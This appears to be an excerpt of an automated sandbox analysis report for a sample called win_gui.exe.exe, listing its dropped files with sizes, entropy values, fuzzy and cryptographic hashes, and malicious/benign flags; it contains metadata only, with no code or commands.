                                SHA-512:34308D4511A2FCE5EAEC2FC59639981DFB474930A158CD81EF0CC7C3AA4EEAA19AA7CA5F0ED908991AB0FB8696993724BB22EAB7C97FF3702A773F799877EBD2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11001
                                Entropy (8bit):7.980715298963405
                                Encrypted:false
                                SSDEEP:192:e+RVzkU8d4lW3AW13V2UnVbZnh8xgQOWXAkQ+f7eNjZ7RqbTWx/+VOh:xCgAZ131VNh8yL1kQ+fihZ7kbC+VOh
                                MD5:3ED512D3C876C7BE8568373149A483C0
                                SHA1:20B1D3527E9D5132A832788D9917B801A6A67FA0
                                SHA-256:15A8C3A67411D4D0CC923DF7C2849BBAD416F6178E305F1691D80B90B51EA18F
                                SHA-512:CA752D6FE9E67F96156CC8EF1ADF410A81242D2B806F8616D0F1E287347F149E47B9FDA8E60DFE92C4643A0496A032A924B6874BA1291F07816A49CF10EC0890
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3548406
                                Entropy (8bit):6.798143809423666
                                Encrypted:false
                                SSDEEP:49152:+4zJYGPpxjOBAS++jqWr739qhgO587exNJrGAhiDwthCHJu9r2JcaD4oc2HmtjLS:+b19T1P2YqSKlOeu
                                MD5:25A311C95078B93CC42F6531D3A612A1
                                SHA1:00DABEB03D68B501CBCD2EB7A8ADD4ABEE9C7FF1
                                SHA-256:84FA49B89AAB47DC8B3469F4B3693A6EA9D6CC7D81EB4B643D70E922E5B7E5DA
                                SHA-512:F16E3950475A374C6C938523CDAFBCB288F082A38E5BA17C11898251713D4F18C2A433DC0B963E47863BD814DC74D38FAED358366CF5CA99A009EE5AAC3A760D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55854590
                                Entropy (8bit):6.820564324964731
                                Encrypted:false
                                SSDEEP:786432:9zSLP+/BSlfldU/7GGmAhAIQ9r5t2UQ6q6px4bx:lIP+6U/7GFAdrx
                                MD5:869B1F15E03E8EDD404CCAEC44BCBA87
                                SHA1:6C0890CFEF4731FA1EA2B8AF0F5F7F6DDFDA9BD8
                                SHA-256:C4B4BEEC90E7FB6C2836777BBC01B7DEE0F69E4D229B5B1A98064BEFE569D2C8
                                SHA-512:03C7B53CF5F54141A931DDDFD4B2FAA59A6490F811EAD4949EBA75FC10504316DF90D52396F5073DB3B16A7F3C3FE134ABF3FEDCC54B547BA45764A9874992B2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1818
                                Entropy (8bit):7.8802743426051345
                                Encrypted:false
                                SSDEEP:48:YY7YuGUJ2ugW0O8Z6nhL/0X/WyYu+MAVMJg6Tc6:Y4YGMZy5/yevuAVOc6
                                MD5:79D70B8B66A730B1EE3B63A2C2F1CD7C
                                SHA1:2565559F82A98DA019593C7D614385D554D16DC9
                                SHA-256:BCBC2BB3D8BD42D717BB00BBB076F5CC1627AE0DE78F71D7B4C81A7FF5E38D7D
                                SHA-512:2235846324DF0B96F488B1B54D434533CAA4EC85981AC45664FA406B7B62CDE31A9D0CAC0C0B2E479EC691E6F6B5A4E254530945C59228DD80489CF98B990BF0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104393
                                Entropy (8bit):7.9983503100924604
                                Encrypted:true
                                SSDEEP:3072:JqMW1NVo9+bv/m5hc/N0j+uINdBz/RCRplclIOPeL3:It13MYv/JN0qVaOPm3
                                MD5:2CADB11EA3B61985BE6A61D9C3F1E877
                                SHA1:4BAFE242019826DFA83D6A8E254CFA89D88BE65D
                                SHA-256:A8276D7300997C5E99FD732ADEE53614ED65054B493C2935BBE21F02826470F7
                                SHA-512:952AF17E65B45E28706E0504CEACAB354A2F2C60EC5C9A4C004546A45E8E48175E760BCC8C0483F09A970F73CDE80126A606524B3A1D915B9DD4C92C07DB4119
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10185
                                Entropy (8bit):7.979443429815771
                                Encrypted:false
                                SSDEEP:192:dPNgptijU5m2I1XFUipy5uj4itteg3WA7lQm0qcCjk9GgG4ZgiH2ZOrlxN+VOCk:dPwtRTI4aygj4ibm4lQmgCjzgG4ZgiHF
                                MD5:C4991D942E9BFD2F3A5EF0CABA9A3939
                                SHA1:11130913927AA9838276DEA9CA1CF9FF979640DC
                                SHA-256:262A6BF82769A0E9DC1CA074968AEA74B12B467DFA589C36F83EABDA47AB4109
                                SHA-512:B2646DED61A0DFAA86FD41A26CA0DFCA9DB0546E504C1E92061A5983141C05B95EE811B0855B4C1FDF668CE57DFFED2C3DAF5960DE8EBF09C9120D6163D2CC7E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5036392
                                Entropy (8bit):6.335390285867676
                                Encrypted:false
                                SSDEEP:49152:4d85mmw4RuS5cwD/Sh3NI3CUViwc83NIhvnCtd:4KMmw4EStbnfiTO
                                MD5:D221E3A6F4DE1D4A66FC15B259321A93
                                SHA1:8B275024F028460A06C05FDD1250A2DE905B7EC9
                                SHA-256:093AD744F51B3193E7F36D7306BE6AB0FC7AEF72410EBE8E9CA869C65173E7E6
                                SHA-512:A5AC548F998B87A0DDBC091CFF3A4FF361ACC34053B2C19DC168DBC76029E4D8E3BC363095C084AC5CE76BE58F0350B808B09BA7E5984F99F8BED15C2E409516
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):889
                                Entropy (8bit):7.698642389458632
                                Encrypted:false
                                SSDEEP:24:gDNsDP3EijbF3z/wpDyYPGTNj0hOHAVMJg6WXs9C27:INsDP3Eijx/WyYu+MAVMJg6TX
                                MD5:362E9AB21544B0AC4E68F5EA458433B2
                                SHA1:F070CB4F25F118D3ABDCBBDE9067749502E35A83
                                SHA-256:B138EFC0D4F2A440CB42D31AFD2A2CAE8A11C4BCD0C91A00BF630EDDA66552EA
                                SHA-512:5DCF96AA7A6ECB15103EC8AB25B010483A6992100096099600A691B53A086921CEB6FF1283950D0E1A5CAF8280F5C65A6CB191E2393AA63C06BA613470321659
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5219
                                Entropy (8bit):7.969753279292825
                                Encrypted:false
                                SSDEEP:96:Dh6BO5x+1mAF6L7JsGB301ROufrTSVsLTdEvFrGzVOcevuAVOwO:16sx7JPS3JfrT/FI+Qc+VOwO
                                MD5:D5F2F8A8907DE87F924C46F815488EF9
                                SHA1:B0F04DA8D7CAEA4AAEB39BFC51A7B2695FA90E47
                                SHA-256:336BE0F8470C1DC1CCBAF627CED3EF05B29877E57F3E07D58B871743D5D14788
                                SHA-512:F8D58A317D20DCB7CF71CC4F4C4E57A95B1C4D0D3EFEB07A427E1C32C8CE14A6400CCADBC834244B2BAAA6805D4A10407902CEA5010483E71766DEBAD636F08A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):739037
                                Entropy (8bit):7.952908837104348
                                Encrypted:false
                                SSDEEP:12288:Mz5RboJ3myGhslT8c2fscBNVRFCToZr5RCmUQHr+kRB5fWK66sO/NnnFwYlcgmH:M3bIrGCZ2xBbmsZdRC4Ck9H3p6pgmH
                                MD5:40368EDA6AE3B8354C360537C9D1237F
                                SHA1:AD40A4562D9082CDC011F76C90A7A74B64740619
                                SHA-256:9F0C86D7F9BB8D74E0E03E31BB09F68C74A097D8FF04C63C1ADC69B4FEC7D809
                                SHA-512:720ED4644D9C9295C6331F72989F97A472ABDC7E60056B91788FF58669A1A3DC612C770396F2C25D69FEC745A03E16E40BA94BF4C3EDD5F35E2F291F82860700
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1526742
                                Entropy (8bit):7.978499590623346
                                Encrypted:false
                                SSDEEP:24576:ES9q8w3Tg/ATAJJB+VE3S7yVI+eptWDftSwDwmwDFqCjjqItlu:ESMn3c/AU+8AyVIdrwDgLjWItlu
                                MD5:123FB592E6D8C3EBD968B7A8B0C9C3A7
                                SHA1:646CAC582B15D3694940DDACDF310A4D6C4B798D
                                SHA-256:D2860CA1E7140788F9523979F92508928973976DE9F67C4C45BDEF0E25A5AB97
                                SHA-512:9F8820CBDFEBC497F00CAF260898A6DE6B7C93AA68D50CE35B138527C6BE089130977C95831C30F8355C238BE72E6B14B13760D45C4D2FDEE017032A1F6D722D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3446796
                                Entropy (8bit):7.9611405767191075
                                Encrypted:false
                                SSDEEP:98304:lAABjXt8md3x/pS6+X3Bzx3FVjbqOMhbJ52NID:pt8md3x/pS6uBzoNhtT
                                MD5:3CBE299688C617F3B5EE2BBC58ABE1C3
                                SHA1:DF2942835BEBD2C0F9CC825E8ADC63AC39536C8F
                                SHA-256:2BF317F84C4B861872181D95E29942266135997B99B98678A71562794CCE11B1
                                SHA-512:5234D4C7769EE962EBF7F6CF1022B17531EA8E9339BEBC0BE39363BA3D49C09BFDD27453877D9403CFB76E2BD337A0AA435D4CEA31FFCD2A843C93D5EC925B9C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1595467
                                Entropy (8bit):7.945953786651401
                                Encrypted:false
                                SSDEEP:49152:yJAYlO3BpOmxQ0CpGPlt93AGnQ1kxnqIVF:yJAn3Up2RAIQYnqIv
                                MD5:38076B2B0AF360CADDA45731ADA0436B
                                SHA1:5A9BC147E43FF271A6868E649E08E3A47F1AE1FB
                                SHA-256:37F111E1D565F1AFC6590016EB3738AB75AC76A0A590EFF2767E413C2B8BB039
                                SHA-512:90BD4D412088350BA70D4A3799D8B42CEE87FA287B08C91108158A90531C1377D8CB0E076A7610BFD1594038A34E36BF2F0EADE4C38FAF6F00B6CB20C5D93521
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1838139
                                Entropy (8bit):7.948010826456849
                                Encrypted:false
                                SSDEEP:49152:PYo3rCYlO3BpUxe0J29T8g+ycADO02rvizPctl:1Wn3AV29OycJ3
                                MD5:715C4EA911AB34C9BDF31E9DC3E0CDA9
                                SHA1:D606F9051883D9621C72D78AAC6801AD6EDF4E1F
                                SHA-256:748278FA2663C722AC479DD11752E1B6FE8841797C53070474825AFB4C0F52B8
                                SHA-512:6E9DC0E2DB54BDDBF1B5A786A7945B1C4D36C196DD359EC65ECAFB1506BAF1A60EEF695EEAA7986B0380A7D847D266C496ACF6A3C6C8FA80D884DF2B42BF1EBA
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):329396
                                Entropy (8bit):7.999458971342388
                                Encrypted:true
                                SSDEEP:6144:UIlV/eXjPPREuCnQIVmI8i4lOHIMfo1DQB2jo7TyCnIYEcFJGBgWxY:UIlhWjBEuAQIII8xkQ10mgTqYEcFJGP6
                                MD5:347EB0D21679FA0359E01CF62F2D0AA2
                                SHA1:A48234F9ED7D030C3FD25777457BE87D30868C82
                                SHA-256:6A0D5A169D5D625257D2B733853CBC7203C919DE46366687E358CE916611846B
                                SHA-512:1C882EAAD747B41D3E512907F1F7F59B63AA5C4EB4FB176CF3C881580285593E69D071520AA802E66CABD7FB02331B9B12F17E6AFA1F89223CD70F1C9E0AACDE
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):307491
                                Entropy (8bit):7.999459976821999
                                Encrypted:true
                                SSDEEP:6144:hBp/fdX2jB59w/KZ+9+TMx/Mtu0JcBj0+eWVc3+WOyD+6IkWDKgdhf9agd2jUBwZ:hHdGjBCKo4M1hqCzDcuWI/rfyPEVy
                                MD5:9271A4B0D915B9484E20C29C6B3D8810
                                SHA1:D4B1EE953A292F6D5CECB7110A675BDF9517F7D8
                                SHA-256:C7A4AEE627F2B55D685CD9C9D52FFDF9B0401FFC85EA8BCAE292AF3D4681E60F
                                SHA-512:11873BE6009F6736841AE8EB3E84D77082588431083AFAAC0AB1B31017E11C34C1B1264A91B9902D0681013565BD647FFAFE8CB95299047D8D74C5FB6514E2B9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8706177
                                Entropy (8bit):7.975157344042223
                                Encrypted:false
                                SSDEEP:196608:yjK7YlmZcPZClC6QAZ2sjCvWJo2sKLCIV5JAmadFS/Zurw:KHlVUPQAriWJo2Lrsrw
                                MD5:D0B4E6FCA8933A3D4FBDA695461F280B
                                SHA1:850F0A2D1FBDD070E44755114A7CC81CDA88ABA1
                                SHA-256:944CE6CBC6A65F956A2BC2CFB2641E6396B8FA00C82A8564AA64602F8C881597
                                SHA-512:17C27EFC438DD94653CADAF4D4F1746B3D668AD0099680B1DF0282B09806459C1AFE94A38D815C49508CE0494175528862C410FAA1A8A85AA5791FC8DE299BFE
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1623868
                                Entropy (8bit):7.92955460291453
                                Encrypted:false
                                SSDEEP:49152:dqah71PI+6fB3Abk+iQHZtHmV4RfiMNccSvIr/nSh:sag+6pQbk+iEZtGV4lVWcSvIr/n6
                                MD5:5315ECE7C5085A4DE23459C4BA257031
                                SHA1:C23F6401E36FDEDA4A4AD6678F6CA511429983CB
                                SHA-256:A9E293592475C613E890A9F5576D01C00CBA05BFB2F5E7A85515666EB9E78FE9
                                SHA-512:7729DCE777763A86BD172D7B8979DFD3D640BDF3A246A6387372C699C17AC6D489C5C5DE38BB1FD0CA8FBA86C24AC812DAA672BE68A503AC5737B9101A4886D4
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):865418
                                Entropy (8bit):7.941334721124736
                                Encrypted:false
                                SSDEEP:12288:3oUUO6zqjl6HXIgRoy0Lop1uns8fj7dfFfqVTeNf+pJIZDOZm002sPzPEpX0+s0R:zy35VooKsEfBaeVMJLZm0kajwuQfUX
                                MD5:2DA2F5EED127B1A3E0EC6E564BEA2CC4
                                SHA1:D4429D97CB337948DABF08B4F2D93E5781F89C64
                                SHA-256:F1B39F5E19D85EB736666741DB3C0D5B19BDEFE93D6E087425F7BA3DA10D7DDD
                                SHA-512:FFA40058B13F6B457F412637CBEA270CFA31F20102327E02A214956ACDA816876C485002F40758ABAFDC68FD65B09905A2DF846BD66B87ABE4B64B05C5995408
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):772641
                                Entropy (8bit):7.9542632556813
                                Encrypted:false
                                SSDEEP:12288:ICcEvhvQMuHM2MOQj7NA7JW3YYNLHFvHxozHUt3Uz7R6Z+ptghUGJDTQMUryRmJa:IVEvhoDi7NAANLlvHxoz0t/ZdxwJZ9De
                                MD5:2E911ECE0CB38FC52F5D674A5F96DB74
                                SHA1:A1B6E28E2EE82A6DC9A20B5187E3BAAC18018E12
                                SHA-256:FF162F1F020624B2F6617FFD7573A3B64CE9FE451ED33F4035E7D453C3A4D5DC
                                SHA-512:7F785A50255B4BEC10C9D9448D4117148426509E813603403598B347159DB6EB5C28E4445010F5464CACA910E09607558948C0F7F67C52794BA2BB508CD69E06
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):68348
                                Entropy (8bit):7.997326446559704
                                Encrypted:true
                                SSDEEP:1536:0VfAk/nKkrvuGVpmGUvwWiie/AxOksjmb1ZvnxsXHT3uCTHykX5:cFKkDvVIPCAx3bhZ/+Xz+cJ
                                MD5:05D51CBBE2B41ABE9D0BD26A936A36FE
                                SHA1:2AFAD2B24F173C5E105E3D9301AA57D9184921D5
                                SHA-256:DECC15C02058939A1E7F71BE31303A6DA255F9A7242764F38AA05421983B869B
                                SHA-512:448FC1950DDC24BE333FE5ABF9464BF1E18948F7090FF99255AD78F8C466E113B0D5F15C0DDDBB92D355828AB8862C5A5F792D87BD77763C7685F10449D781A4
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17556
                                Entropy (8bit):7.988576764272021
                                Encrypted:false
                                SSDEEP:384:JoETATe6bQia+0yu/dsEc883+rnYYXW5pqxrgm57L9Y2fDJQW3+VOdW:eE0CBia+0yBEc8nYYXYp3m19Y2fDJQWs
                                MD5:1F70ED38D5468CC2F8327CA7A171251A
                                SHA1:F84A869E5C2684EC33EC3DFEA5746BB1C63F8FFC
                                SHA-256:349470F01A27A1FD3E29ADB7A86695C12C13FF4640A732592CFD869CAD0FFB13
                                SHA-512:4BCF6F5A0477AE05E9548B55D649716FCF4E25D163842DA04045E50A88BE3B3F1D8D0CCC2456BEC32DD52538C0944A84B3B5D4EBF29069A65228894B9B2C21A3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):174296
                                Entropy (8bit):7.998846328690469
                                Encrypted:true
                                SSDEEP:3072:p0i/znyZxuUDXVCCbFO8hwM2pEoLIfydqn3duEAp3SmV3jsj3hhBX:xLyDudCbFOOwM0EKkyFEAp3JV3jsbhhl
                                MD5:F9D8E290904397A6590A7BF305B94E88
                                SHA1:F43CDDE51AB71D77FCB5C7C57A4118B91055E4DC
                                SHA-256:0A6D5E38EB15FC397E108E75A9BDF3A22DB872E51DF8079BD9D57A377AFCBEAF
                                SHA-512:994CAD0BAE2ABB90135A5A2BD1D1181C8E8FBC691D7D4504AD3919E32A092424723B0F363C017BD566A15F10C58023173463544235278022738C7D55D4197058
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95054
                                Entropy (8bit):7.998035396213496
                                Encrypted:true
                                SSDEEP:1536:7m6Y0vdJWyhFOZN69kYga4f1q2l64k5/djTdOwlqDyDEU+5tNc5J1NfwAEZHkl6:669J/hFOZw9kYLY1561/dTdah5kdNfd8
                                MD5:375D1D72A2004CE8015D8B65C8E330D2
                                SHA1:7F9FF264F88C55292A22D8EF3E34A1649E85336F
                                SHA-256:FCE399C7E06D771148FD43C66825C8D1E51EFAB545CA3ACF542776059CC36555
                                SHA-512:5ADD5010B77766D5A3788EE298E03CE5462F52E314B66A2155BA2C24BC589CF9AB7E65888612FD6DFB9C3121D6D15EC3741AEB836E0F416F194FC7FA684370B9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1664
                                Entropy (8bit):7.864028799957495
                                Encrypted:false
                                SSDEEP:48:Jqr7hqR9rGgod/zoS4N7/WyYu+MAVMJg6TO:JqPMHud/0fN7evuAVOO
                                MD5:DFF54B9CDAF3B5A65465F459841F98C1
                                SHA1:64DB3E7BD7408EB5D282DCDE3330D0DF7A50F493
                                SHA-256:54E48D5067E71C2AC04777B4EFB5923B0631A1D1F233037358F65932DAA10249
                                SHA-512:8996907737534661A06FA44F3400DA9858D95A56B7D9A28D309416CBEB80D1DEB9E463C563A7488CB21DB7C5E1F8F8AC5710E87850DE8A708B700F535684BDF6
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):102314
                                Entropy (8bit):7.998057581169843
                                Encrypted:true
                                SSDEEP:1536:iee6oaPeOoD7lpcS3ZwfeTUP34ZrLRu5khIlUPPBJeIF0oaV7g5g+LB:iee6Pe/5wfHf4Zr5ClUPP6IF0oaNg68B
                                MD5:31B4995447F6FDE0D82919B7267FEF9B
                                SHA1:F01AF399923C7BE4649158767B54E7F7C42CB145
                                SHA-256:CD74201D6E8B64D0812F599DADD2FA1D327D61EFB57A829370C3A2A0CCE8C40A
                                SHA-512:9C22E835C21D4583F0A7DDFCD34ACBDDECFF053FFA460DAFFB1463EAB25384DE1379388C5E07168C32394F6E1034C5B74EF7924729DD82C24C34C6F76DCD9F5E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59644
                                Entropy (8bit):7.997026631063287
                                Encrypted:true
                                SSDEEP:1536:0faGhYzDN8c1dG5cPuIDeW3tMBTpSfEGfoq99IFrgB:AaQWN8eG5cPuCpfEsoq3+rg
                                MD5:E95DA8EA0DBF3D3DB43136DF5ACF60A3
                                SHA1:9919DA0DCF7442A064B5CA06335EA789916FF34A
                                SHA-256:296A30821A4F6CE84CE3049E55A54E7487E34CA412FB6DD1C07B2AFCBB720C84
                                SHA-512:0D169DBDFADD31E1C6C3D203B7807DBAB44E1CDBEC28FB4638D4985CDCEB1F72D39B8D4A1D15B47F03E16205D0B515D174B71FA6DFF3D42F3BCD23E848ED9271
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10422
                                Entropy (8bit):7.979736095838601
                                Encrypted:false
                                SSDEEP:192:kczuwl8xYIH9hwfUMqTIqf+pNu79aCD6a35nXa4q5z3WmxD27XkfeYKa2+VOY:xF8DK+TILpAvDXpjUamtgXkf72+VOY
                                MD5:BAA2885828BA89C1F946156AACE71E51
                                SHA1:0C97D0178C0631A9B2189CC89CBCE8C1652E92A6
                                SHA-256:DC45A59D27D59C62016EF288151CB6760B3030AB6A4834912BCA7293F211D0B3
                                SHA-512:B748428A0516FE238B1789E2457A540EC36769408213BC4BE9529AC0224A09327CE8C971147CBD1F7AC8B7451D73F7D557B1F14D0A51751C5D307D53C74E2F18
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38578
                                Entropy (8bit):7.995191232608667
                                Encrypted:true
                                SSDEEP:768:/6KCTd2m6fr4LyK8JQN29ZzhFd0yHVh29Hfr/pjiIubVq:FLV9QNeRhFdPH2pGIupq
                                MD5:7EE8AD824ED06B5ED1DA030B70DD410F
                                SHA1:9690CD6723C2A3388203C45E3CDC239380646CB1
                                SHA-256:3BA05D05EC0C81CB4740F3721E97AE3210909692F56B751B2CB856C98078D45B
                                SHA-512:604FA0C1CE3ABF0F0E29A7E7E15F292E93A099FAA856C12B0EAE38AD31E634AA23B42159A2463D835476D562BFE7AC2649ACA5F5C21F34AE9A486EC61F9D2781
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):22666
                                Entropy (8bit):7.993147555732763
                                Encrypted:true
                                SSDEEP:384:qgBSQ7A1Q+m4YI/gMKP2tr2qECSUuzidE2XMtQ4skcCU3suzIslafyXkd9wX1P+F:qPQ7mQ+m4Ybp2tCqEJDz4EKMtN6CU8uA
                                MD5:573655B6C9ACAF9598501E7E7C2B14F4
                                SHA1:110B1F5D0390ABF635A45297EF13C6DCE3A76A4C
                                SHA-256:59A32174D33372BBC58447BE6CB35BA2F1FAE925A4416E2E820B1E2BFFDAF8A9
                                SHA-512:83680519B13A02425669E285C674BE51516371909F8EA8BD04E0A9AC8550F2733AD905748DA98C3D3DDA9946468E91EA024110C6657BB1B36F452533EA3A78BB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12026
                                Entropy (8bit):7.983765093066229
                                Encrypted:false
                                SSDEEP:192:FhIaBS88bciBfg6IK7JegGyFs87NJqOYnDIJIGAlcmW0aGSYrjvWPhr6gBBCjQ+d:FGaBsbcNlYevyPqOYn+VAlcmnPZr7WZk
                                MD5:A59B2E80BDC96E1C3A29AAF037CD6A1E
                                SHA1:2BF46B92497D4D002864A2E6D6BD7164CFB2623E
                                SHA-256:429DF0F478413CA6EC7F0FE453F9E68B0471C94FD543EA46212C9B08B0AF86CE
                                SHA-512:B69986ACC020EFB784000A497AC68A0BE204C81CD90FECDB958351081DAAA10C859F18B951AC217743A4477FE11CD7FA9713C544343A5CC604F57BAA88539F6A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:frozen file 1.0 (or gzip 0.5)
                                Category:dropped
                                Size (bytes):284718
                                Entropy (8bit):7.99927748311118
                                Encrypted:true
                                SSDEEP:6144:10FLhvenrrY10Vfz0wcepOMRuZJkJngYSjckcnQ7wUcTuV52G+UBhllXHT+Sy4gv:gL681ifWNMYZGJngYU7wvGbBpQv
                                MD5:CA2046377FAB90724AF62494172405BC
                                SHA1:0A18F996865E78C2AD5147D6E471145965A2DEE9
                                SHA-256:8DFBEC73187C7F906EBF6B5067FB1D333EEDBBF6627B4876A77E7CA7232246F8
                                SHA-512:81E9ABFFF166181B9C825C6E8E0FDB3FEF8BDCCA981898DE04C8E5AF598D3FEA15382BC5A511A2C802906AA31EA64E698678E0CB0209CCBB3C404C0188FAD138
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):134572
                                Entropy (8bit):7.998596058701348
                                Encrypted:true
                                SSDEEP:3072:o6vA3uGTuPa+3NNuHMEv4OW5oPHITaM3o06VYnJ201Qd:o6vARG9NYwz5kHwpVuYJSd
                                MD5:F3CEE3CB8266BEC45FDAFEAF4546AE98
                                SHA1:A4871B87AFB738F67605ADFBC000C44E9EC306B6
                                SHA-256:0B27CF5274C03F962035F398FD043DF39E0424238219EDEFFBBC9C4BBDF79CFF
                                SHA-512:12ABC79EF827FB417E939BE71F967FBFA8A68B371027DF7ECF45C3C3C6E6F002A17D9AF1BF0ED5B796C46C7570FF12182DCDC66269143DA6AA88BA66B0EE48AB
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19018
                                Entropy (8bit):7.989987692791979
                                Encrypted:false
                                SSDEEP:384:wYfBAnOku65OAtmQThHFbenphmKb8ksIQNKqIQ1C0rNsR2pAU3gK+VOf:nqOt6gURbophV8ks1jp1tNI25wKj
                                MD5:DDB43EB4AF6C76DFB83E49765F225E4B
                                SHA1:30ECEC9BB989B9462A4653F0CCB19C0FD26622C9
                                SHA-256:003B8460E4B04D0F995C8473542023CA0CE6770B9029FF796F2B582214A1DFF0
                                SHA-512:C81401A44528E720A4DD6E16B2499A7E995737193FBDE48F2EF2C583740F27B0E77296AACAE9C68D6B66C89024FB8561A64E4F03E7FC14A006792B6710A64F09
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1835616
                                Entropy (8bit):5.449303450297782
                                Encrypted:false
                                SSDEEP:24576:7mQ0JlVkITxwioiEDH3i+Hj1D+fnuEVW2UF8:7X0JliIDoxDXR4fnn7UF8
                                MD5:5F3DB0257DB5BEC996BE65DE136CE8D8
                                SHA1:86EC10C9C63A2D30E116F51213D723E2C270928D
                                SHA-256:290F22C4695AC005C1648B37C85C28CD058B54B0753F0518C7976BDA3147A147
                                SHA-512:31655D28217622FDB2D6ED4EF7AA25C1126437D9136500945EC41A6BFD351060169744F22F328A81387E4417C4149F23ABEB9CA1ECEE57D33F9A3FB501AD329D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33376
                                Entropy (8bit):7.993690549160133
                                Encrypted:true
                                SSDEEP:768:zx6DE4qiCbOX/a/JGXyz1uhCm4W/01XZ9yzoKYh/2xM0:N8ZnCiqJXc7n0Pyzo14xx
                                MD5:49B37FA72913A19605D45FACB470F8ED
                                SHA1:F34096EE71BD4D783834241D7F1187E9675471C6
                                SHA-256:9DEC9A84B64739BFC18091DA4263DACACF60079DEE309293BA81403D18341DE5
                                SHA-512:9980931FE564BAC39C0895CC65C508ECAF07F7519CEC4E324139EC93158BD3148E8A5183E3F4197614494A7EAF5E65CDBA461EC9E3ECDEFD50224595F1E2F7E0
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):524896
                                Entropy (8bit):6.861562429617699
                                Encrypted:false
                                SSDEEP:6144:OStIehZz64JFcG4Mql+jS/H68uQ9gVf4ibgBerd8GQZ2sBnIjmjnY4cG2:NhZz64ncICH68u4afPYXZvHjY1l
                                MD5:4F0E24439C8E262637F04B87E8A6C962
                                SHA1:81B655FD14F694781C0A162818C15DD78B1C759A
                                SHA-256:D5AB31FFFAA6B4BD77DD9E9A36E3A83DF00AFB96D4AB2601E5A373067880E987
                                SHA-512:993E268D54012636D645E4F85420F47CFA47A65F21EB80A77F98875F9EB715DE5BA0960736B01134AFE7C56CF8D7CD5EA903C74F1CBBC41E1202202BA251A489
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):262752
                                Entropy (8bit):7.999367826948063
                                Encrypted:true
                                SSDEEP:6144:IZNdZdJtxADrmXPRiyaKDUauCDHFP1sayRhS5yqYju0BBFJpA:IZNHj5aKDUaP/oRqSjuQJy
